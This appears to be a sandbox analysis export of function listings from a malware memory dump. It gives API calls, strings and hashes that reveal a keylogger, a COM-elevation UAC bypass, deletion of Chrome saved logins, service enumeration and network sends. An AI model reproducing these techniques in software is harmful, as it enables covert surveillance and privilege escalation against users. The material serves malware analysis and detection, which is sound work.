Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Menu$PopupWindow$AppendCreateCursorExitForegroundIconNotifyNtdllProc_ProcessShell_Track
String ID:
API String ID: 1665278180-0
Opcode ID: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
Instruction ID: a13fdb83ba718a1706ffd80e8cfd455283d0fbb88ed43c0684aa025663a1ce4b
Opcode Fuzzy Hash: 17791859dac929b483a24ff72816a8478769eebc5405c417f6cbcdd658e3cffe
Instruction Fuzzy Hash: B6210C31124205FFDB196F64ED4EAAE3FB5EB04302F004536F906A5172E7B5DA61EB28

Function 00418754 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 197COMMON

Download Yara Rule

Strings

6, xrefs: 00418935
4, xrefs: 004188DA
3, xrefs: 00418876
0, xrefs: 0041877D
5, xrefs: 0041892B
2, xrefs: 00418816
7, xrefs: 0041894C
1, xrefs: 004187B6

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID:
String ID: 0$1$2$3$4$5$6$7
API String ID: 0-3177665633
Opcode ID: cde1b3d257b3b84ac0aca3a867a652d949c29c2e455d7912b36e5a4a136b74f3
Instruction ID: 2879f211a781d1662389055333b9a248a4bc7621c6500268a6892da51c348380
Opcode Fuzzy Hash: cde1b3d257b3b84ac0aca3a867a652d949c29c2e455d7912b36e5a4a136b74f3
Instruction Fuzzy Hash: CC61A370508301AEDB00EF21D862FEA77E4AF85754F40485EFA91672E1DF789A48C797

Function 00409B10 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 108keyboardthreadCOMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 00409B3F
GetWindowThreadProcessId.USER32(00000000,?), ref: 00409B4B
GetKeyboardLayout.USER32(00000000), ref: 00409B52
GetKeyState.USER32(00000010), ref: 00409B5C
GetKeyboardState.USER32(?), ref: 00409B67
ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409B8A
ToUnicodeEx.USER32(?,?,00000010,00000000,00000000), ref: 00409BE3
ToUnicodeEx.USER32(?,?,?,?,00000010,00000000,00000000), ref: 00409C1C

Strings

8[G, xrefs: 00409BFD

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Unicode$KeyboardStateWindow$ForegroundLayoutProcessThread
String ID: 8[G
API String ID: 1888522110-1691237782
Opcode ID: 4b0c9e0bc7e84372998f3d61255679a89afbe694587f881e977bd8f932731c77
Instruction ID: f24a8317de74a0bbad47f265c67a45df51816e9018bfad09e00086f3728f1c27
Opcode Fuzzy Hash: 4b0c9e0bc7e84372998f3d61255679a89afbe694587f881e977bd8f932731c77
Instruction Fuzzy Hash: EE318172508309AFD700DF90DC85FDBB7ECEB48715F00083ABA45961A1D6B5E948DB96

Function 00406764 Relevance: 15.8, APIs: 2, Strings: 7, Instructions: 55COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00406788
CoGetObject.OLE32(?,00000024,004659B0,00000000), ref: 004067E9

Strings

[-] CoGetObject FAILURE, xrefs: 004067F1, 00406800
$, xrefs: 004067A2
[+] CoGetObject, xrefs: 004067C8
{3E5FC7F9-9A51-4367-9063-A120244FBEC7}, xrefs: 0040677D, 00406782, 004067C1
Elevation:Administrator!new:, xrefs: 004067A9
[+] CoGetObject SUCCESS, xrefs: 004067F8
[+] ucmAllocateElevatedObject, xrefs: 0040676F

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Object_wcslen
String ID: $$Elevation:Administrator!new:$[+] CoGetObject$[+] CoGetObject SUCCESS$[+] ucmAllocateElevatedObject$[-] CoGetObject FAILURE${3E5FC7F9-9A51-4367-9063-A120244FBEC7}
API String ID: 240030777-3166923314
Opcode ID: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
Instruction ID: dba8c49f7cecafb8ed31af17d29d910bb03d3c12ecd117c8e18c4d6c9c114880
Opcode Fuzzy Hash: db32128b02a1ccbc70c4588b7822f6c775a314ba91b6364ff21a4127614396bf
Instruction Fuzzy Hash: 811170B2901118AEDB10FAA5884AA9EB7BCDB48714F55007FE905F3281E7789A148A7D

Function 004198C2 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 004198D8
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 00419927
GetLastError.KERNEL32 ref: 00419935
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 0041996D

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: EnumServicesStatus$ErrorLastManagerOpen
String ID:
API String ID: 3587775597-0
Opcode ID: e3d1edc2b9cca4ff482570dad0bde33c69be011025e12f7f0431cb73b337f97f
Instruction ID: 5304d2aa3016a1bb8b693e548c532b43deb082133906afc562c92feca393f19d
Opcode Fuzzy Hash: e3d1edc2b9cca4ff482570dad0bde33c69be011025e12f7f0431cb73b337f97f
Instruction Fuzzy Hash: 37812F711083049BC614FB21DC959AFB7A8BF94718F50493EF582521E2EF78AA05CB9A

Function 02489B29 Relevance: 15.2, APIs: 10, Instructions: 228serviceCOMMON

Download Yara Rule

APIs

OpenSCManagerA.ADVAPI32(00000000,00000000,00000004,004748F8), ref: 02489B3F
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,?,00000000,?,?,?), ref: 02489B8E
GetLastError.KERNEL32 ref: 02489B9C
EnumServicesStatusW.ADVAPI32(00000000,0000003B,00000003,00000000,?,?,?,?), ref: 02489BD4

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: EnumServicesStatus$ErrorLastManagerOpen
String ID:
API String ID: 3587775597-0
Opcode ID: e61e99f355a85b792043c415c774071641b882a3dc166781f1924c38db1b4eec
Instruction ID: b900a4fbb76775919a16af5b02a2c036eb237ea1a8deec2ad7faeef846b145ec
Opcode Fuzzy Hash: e61e99f355a85b792043c415c774071641b882a3dc166781f1924c38db1b4eec
Instruction Fuzzy Hash: 13812F71508344ABC714EF21DC90EAFBBA9FF94704F50482EF99242290EF70AA05CF96

Function 004513B7 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 188COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00446EBF: GetLastError.KERNEL32(?,?,0043931C,?,?,?,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B), ref: 00446EC3
Part of subcall function 00446EBF: _free.LIBCMT ref: 00446EF6
Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F37
Part of subcall function 00446EBF: _abort.LIBCMT ref: 00446F3D

Part of subcall function 00446EBF: _free.LIBCMT ref: 00446F1E
Part of subcall function 00446EBF: SetLastError.KERNEL32(00000000,0043E4CD,?,?,?,?,00000000,?,?,0042CE53,0000003B,?,00000041,00000000,00000000), ref: 00446F2B

GetUserDefaultLCID.KERNEL32(?,?,?), ref: 004514C3
IsValidCodePage.KERNEL32(00000000), ref: 0045151E
IsValidLocale.KERNEL32(?,00000001), ref: 0045152D
GetLocaleInfoW.KERNEL32(?,00001001,<D,00000040,?,?,00000055,00000000,?,?,00000055,00000000), ref: 00451575
GetLocaleInfoW.KERNEL32(?,00001002,00000000,00000040), ref: 00451594

Strings

<D, xrefs: 004513E0, 004513F0, 004514B0, 00451452, 00451447, 0045144A, 00451455, 004514B3
<D, xrefs: 004513CD, 0045156C
<D, xrefs: 0045148E, 004514EC, 00451499

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ErrorLastLocale$InfoValid_free$CodeDefaultPageUser_abort
String ID: <D$<D$<D
API String ID: 745075371-3495170934
Opcode ID: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
Instruction ID: fdda48fcf8ef828b158f806230e01f9d82b9b72a6df542884d0e4dc3e0683d2c
Opcode Fuzzy Hash: 5c8e94395c66df2641350def7a129c2a5847567c9c00908226c609ff7e549d11
Instruction Fuzzy Hash: 5A51D571900205ABEF10EFA5CC40BBF73B8AF05702F14056BFD11EB262E7789A488769

Function 0041B42F Relevance: 13.6, APIs: 9, Instructions: 105fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B489
FindNextFileW.KERNEL32(00000000,?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B4BB
SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B529
DeleteFileW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B536

Part of subcall function 0041B42F: RemoveDirectoryW.KERNEL32(?,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B50C

FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B561
RemoveDirectoryW.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B568
GetLastError.KERNEL32(?,?,?,?,?,?,00473EE8,00000000), ref: 0041B570
FindClose.KERNEL32(00000000,?,?,?,?,?,?,00473EE8,00000000), ref: 0041B583

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
String ID:
API String ID: 2341273852-0
Opcode ID: 38605e05b284b3287545d71b9912fe11a1e5e192bb535f2a18b99cb8ec032d5d
Instruction ID: e81c2b0307560c21eb772b723951cbad4d8c7a866ea933437d0d5d39764c0eb1
Opcode Fuzzy Hash: 38605e05b284b3287545d71b9912fe11a1e5e192bb535f2a18b99cb8ec032d5d
Instruction Fuzzy Hash: 0031627184921CAACB20D7B1AC89ADA77BCAF04309F4405EBF505D3181EB799AC5CE69

Function 0248B696 Relevance: 13.6, APIs: 9, Instructions: 105fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(?,?), ref: 0248B6F0
FindNextFileW.KERNEL32(00000000,?), ref: 0248B722
SetFileAttributesW.KERNEL32(?,00000080), ref: 0248B790
DeleteFileW.KERNEL32(?), ref: 0248B79D

Part of subcall function 0248B696: RemoveDirectoryW.KERNEL32(?), ref: 0248B773

FindClose.KERNEL32(00000000), ref: 0248B7C8
RemoveDirectoryW.KERNEL32(00000000), ref: 0248B7CF
GetLastError.KERNEL32 ref: 0248B7D7
FindClose.KERNEL32(00000000), ref: 0248B7EA

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: FileFind$CloseDirectoryRemove$AttributesDeleteErrorFirstLastNext
String ID:
API String ID: 2341273852-0
Opcode ID: 5c62029e558c151831161c7648b51b3c9b0b43d71b7e0bfa42328357c6cc7f75
Instruction ID: 87361405047fe899c440b6879ed8efd0d998d663a32616a4d7bc8f859c630077
Opcode Fuzzy Hash: 5c62029e558c151831161c7648b51b3c9b0b43d71b7e0bfa42328357c6cc7f75
Instruction Fuzzy Hash: 50315C7281421C9ECB20EBB1AC88AEE77BCAF15309F0405EBF515D2181EB75D688CF25

Function 00418C69 Relevance: 12.5, APIs: 2, Strings: 5, Instructions: 245fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 00418EBF
FindNextFileW.KERNEL32(00000000,?,?), ref: 00418F8B

Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00475B70,00473D54,?,00000000,00411F7E,00465324,00465324,00465324,00401703), ref: 0041B633

Strings

>G, xrefs: 00418C99
@CG, xrefs: 00418D5F
`HG, xrefs: 00418FA2
`HG, xrefs: 00418E3C
XCG, xrefs: 00418D49

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: File$Find$CreateFirstNext
String ID: @CG$XCG$`HG$`HG$>G
API String ID: 341183262-3780268858
Opcode ID: 65493262592806af91a3461e355f92b662be1614b7cd4333ec4d5cd03a44076d
Instruction ID: 861c71bda04042c44626cba1538e35c757a91b728f0af2478fb4c1063bb13cc5
Opcode Fuzzy Hash: 65493262592806af91a3461e355f92b662be1614b7cd4333ec4d5cd03a44076d
Instruction Fuzzy Hash: B08141315042405BC314FB62C892EEFB3A5AFD1718F50493FF946671E2EF389A49C69A

Function 004099E4 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 65windowCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00409A01
SetWindowsHookExA.USER32(0000000D,004099D0,00000000), ref: 00409A0F
GetLastError.KERNEL32 ref: 00409A1B

Part of subcall function 0041A686: GetLocalTime.KERNEL32(00000000), ref: 0041A6A0

GetMessageA.USER32(?,00000000,00000000,00000000), ref: 00409A6B
TranslateMessage.USER32(?), ref: 00409A7A
DispatchMessageA.USER32(?), ref: 00409A85

Strings

Keylogger initialization failure: error , xrefs: 00409A32

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Message$DispatchErrorHandleHookLastLocalModuleTimeTranslateWindows
String ID: Keylogger initialization failure: error
API String ID: 3219506041-952744263
Opcode ID: 22d9baebbffe43b905c7b84cf196d320971be0005b55f9c4a762744b284b4bad
Instruction ID: 76b292cdb4e6355f9a4176d1f10d626d2d11be3de55f9aee7ae49bf60faff0c2
Opcode Fuzzy Hash: 22d9baebbffe43b905c7b84cf196d320971be0005b55f9c4a762744b284b4bad
Instruction Fuzzy Hash: 201194716043015BC710AB7AAC4996B77ECAB94B15B10057FFC45D2291FB34DE01CBAB

Function 0247B59C Relevance: 12.1, APIs: 8, Instructions: 145fileCOMMON

Download Yara Rule

APIs

FindFirstFileA.KERNEL32(00000000,?,00000000,00465F1C), ref: 0247B61B
FindClose.KERNEL32(00000000), ref: 0247B635
FindNextFileA.KERNEL32(00000000,?), ref: 0247B758
FindClose.KERNEL32(00000000), ref: 0247B77E

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: Find$CloseFile$FirstNext
String ID:
API String ID: 1164774033-0
Opcode ID: 5b02bdbcf4a37e1aca2b174e4fdcca7b9d7d4ca2704527aaaf21edbe9df3a355
Instruction ID: 2ef180d3841c106589722263cd206cf699edad0b6ce46e3de03b87edd6d0a3af
Opcode Fuzzy Hash: 5b02bdbcf4a37e1aca2b174e4fdcca7b9d7d4ca2704527aaaf21edbe9df3a355
Instruction Fuzzy Hash: 46515031A0421A5ACB15FB62DC55EEE773AFF10304F5001AFE926B6190FFB09A46CE95

Function 00412F45 Relevance: 10.9, APIs: 4, Strings: 2, Instructions: 391registrylibraryloaderCOMMON

Download Yara Rule

APIs

RegCreateKeyExW.ADVAPI32(00000000,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 0041301A
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,00000001), ref: 00413026

Part of subcall function 00404468: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 004044FD

LoadLibraryA.KERNEL32(Shlwapi.dll,SHDeleteKeyW,00000000,00000001), ref: 004131ED
GetProcAddress.KERNEL32(00000000), ref: 004131F4

Strings

SHDeleteKeyW, xrefs: 004131E3
Shlwapi.dll, xrefs: 004131E8

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: AddressCloseCreateLibraryLoadProcsend
String ID: SHDeleteKeyW$Shlwapi.dll
API String ID: 2127411465-314212984
Opcode ID: dbb9fdb3702e8fd2fbf6bfeb33e7c338aa44cf735f681ebb82050532ba5f0f61
Instruction ID: cc67afc49b78d61a2372e1362dfc4f5d4a672f2d1b5b468e2109e7b1f18a6fb5
Opcode Fuzzy Hash: dbb9fdb3702e8fd2fbf6bfeb33e7c338aa44cf735f681ebb82050532ba5f0f61
Instruction Fuzzy Hash: 4FB1B671A043006BC614BA76CC979BE76989F94718F40063FF946B31E2EF7C9A4486DB

Function 02488ED0 Relevance: 10.7, APIs: 1, Strings: 5, Instructions: 245fileCOMMON

Download Yara Rule

APIs

FindFirstFileW.KERNEL32(00000000,?), ref: 02489126

Part of subcall function 0248B881: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,00000000,02473D5A,00465324), ref: 0248B89A

Strings

`HG, xrefs: 02489209
>G, xrefs: 02488F00
@CG, xrefs: 02488FC6
`HG, xrefs: 024890A3
XCG, xrefs: 02488FB0

Memory Dump Source

Source File: 00000000.00000002.1754447898.0000000002470000.00000040.00001000.00020000.00000000.sdmp, Offset: 02470000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2470000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: File$CreateFindFirst
String ID: @CG$XCG$`HG$`HG$>G
API String ID: 41799849-3780268858
Opcode ID: 370f4d1bb48917f4102406aff739b7f4752134e9ba6bc41bde7cf39fc8db8d8c
Instruction ID: 5d5c4cfadba7c22340446522560590456fbcde89ab040ece6ea8e4de47885d60
Opcode Fuzzy Hash: 370f4d1bb48917f4102406aff739b7f4752134e9ba6bc41bde7cf39fc8db8d8c
Instruction Fuzzy Hash: 988143315182415BD319FB26DCA4EEF73AAEF91340F40492FE96A572D0EF709A09CE52

Function 0040E54F Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 88sleepCOMMON

Download Yara Rule

APIs

Part of subcall function 004124B7: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000), ref: 004124D7
Part of subcall function 004124B7: RegQueryValueExA.ADVAPI32(00000000,?,00000000,?,?,?), ref: 004124F5
Part of subcall function 004124B7: RegCloseKey.ADVAPI32(00000000), ref: 00412500

Sleep.KERNEL32(00000BB8), ref: 0040E603
ExitProcess.KERNEL32 ref: 0040E672

Strings

override, xrefs: 0040E574
pth_unenc, xrefs: 0040E565, 0040E5AC, 0040E619
5.3.0 Pro, xrefs: 0040E5DE, 0040E64B
BG, xrefs: 0040E560

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: CloseExitOpenProcessQuerySleepValue
String ID: 5.3.0 Pro$override$pth_unenc$BG
API String ID: 2281282204-3981147832
Opcode ID: 588936d499a968da642e91b338fac2b7336058b449d650a6b17b3578a265ef35
Instruction ID: 346becae97c590b24629de205d3f766cc2ad037e5fc603921d36f10068cff0f4
Opcode Fuzzy Hash: 588936d499a968da642e91b338fac2b7336058b449d650a6b17b3578a265ef35
Instruction Fuzzy Hash: 6B21A131B0030027C608767A891BA6F359A9B91719F90443EF805A76D7EE7D8A6083DF

Function 0040B21B Relevance: 10.5, APIs: 2, Strings: 4, Instructions: 48fileCOMMON

Download Yara Rule

APIs

DeleteFileA.KERNEL32(00000000,\AppData\Local\Google\Chrome\User Data\Default\Login Data), ref: 0040B257
GetLastError.KERNEL32 ref: 0040B261

Strings

[Chrome StoredLogins found, cleared!], xrefs: 0040B287
[Chrome StoredLogins not found], xrefs: 0040B27B
UserProfile, xrefs: 0040B227
\AppData\Local\Google\Chrome\User Data\Default\Login Data, xrefs: 0040B222

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: DeleteErrorFileLast
String ID: [Chrome StoredLogins found, cleared!]$[Chrome StoredLogins not found]$UserProfile$\AppData\Local\Google\Chrome\User Data\Default\Login Data
API String ID: 2018770650-1062637481
Opcode ID: 7367031dd96771d8d2a24b6fe6e07362c0970369f695d1a7631a26e432d3e458
Instruction ID: 236ee74dc97b4bdf00ef4875347123a6b81b21ae8e03a402b83ae8c28ff1bd46
Opcode Fuzzy Hash: 7367031dd96771d8d2a24b6fe6e07362c0970369f695d1a7631a26e432d3e458
Instruction Fuzzy Hash: 3001A23168410597CA0477B5ED6F8AE3624E921704F50017FF802731E2FF3A9A0586DE

Function 00416AB7 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 32COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000028,?), ref: 00416AC4
OpenProcessToken.ADVAPI32(00000000), ref: 00416ACB
LookupPrivilegeValueA.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00416ADD
AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000), ref: 00416AFC
GetLastError.KERNEL32 ref: 00416B02

Strings

SeShutdownPrivilege, xrefs: 00416AD7

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: ProcessToken$AdjustCurrentErrorLastLookupOpenPrivilegePrivilegesValue
String ID: SeShutdownPrivilege
API String ID: 3534403312-3733053543
Opcode ID: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
Instruction ID: c28276ca820f5d67da4083ad645d4fedab17ddc29f560671af9b7c8b6b4fa774
Opcode Fuzzy Hash: e04eb0b34037921419aad719b93aaa051d7dc20f4e189cf25d4eb9764effedfd
Instruction Fuzzy Hash: 25F0D4B5805229BBDB10ABA1EC4DEEF7EBCEF05656F100061B805E2192D6748A44CAB5

Function 00452F00 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00453046

Strings

1#IND, xrefs: 0045423E
1#QNAN, xrefs: 0045424C
1#SNAN, xrefs: 00454245
1#INF, xrefs: 00454253

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 343bacbd156bf7f220a3206736443c631405255b01f250a860f0923d0970eca2
Instruction ID: 57cc16b57fb9b80973019f24a4c29afa226e887048a240d5689d112d8919aadd
Opcode Fuzzy Hash: 343bacbd156bf7f220a3206736443c631405255b01f250a860f0923d0970eca2
Instruction Fuzzy Hash: 08C26F72D046288FDB25CE28DD407EAB7B5EB44346F1441EBD84DE7242E778AE898F44

Function 004089A9 Relevance: 9.3, APIs: 6, Instructions: 288fileCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004089AE

Part of subcall function 004041F1: socket.WS2_32(?,00000001,00000006), ref: 00404212

Part of subcall function 0040428C: connect.WS2_32(00000000,?,?), ref: 004042A5

FindFirstFileW.KERNEL32(00000000,?,?,?,00000064), ref: 00408A8D
FindNextFileW.KERNEL32(00000000,?), ref: 00408AE0
FindClose.KERNEL32(000000FF,?,?,?,?,?,?), ref: 00408AF7

Part of subcall function 00404468: WaitForSingleObject.KERNEL32(00000000,00000000,00473D54,?,?,00000004,?,?,00000004,00473EE8,?,?), ref: 0040450E
Part of subcall function 00404468: SetEvent.KERNEL32(00000000,?,?,00000004,?,?,00000004,00473EE8,?,?,?,?,?,?,?,00473D54), ref: 0040453C

Part of subcall function 004047EB: WaitForSingleObject.KERNEL32(00000001,000000FF,008E54D8,00475BF0,00473D54,00000000,008E54D8,004017F3,?,00000000,00475B70,00473EE8,?,00000000,00401913), ref: 004047FD
Part of subcall function 004047EB: SetEvent.KERNEL32(00000001,?,00000000,00401913), ref: 00404808
Part of subcall function 004047EB: CloseHandle.KERNEL32(00000001,?,00000000,00401913), ref: 00404811

__CxxThrowException@8.LIBVCRUNTIME ref: 00408DA1

Part of subcall function 00404468: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 004044FD

Memory Dump Source

Source File: 00000000.00000002.1753884184.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1753884184.0000000000473000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1753884184.0000000000476000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_2iH7rqx9rQ.jbxd

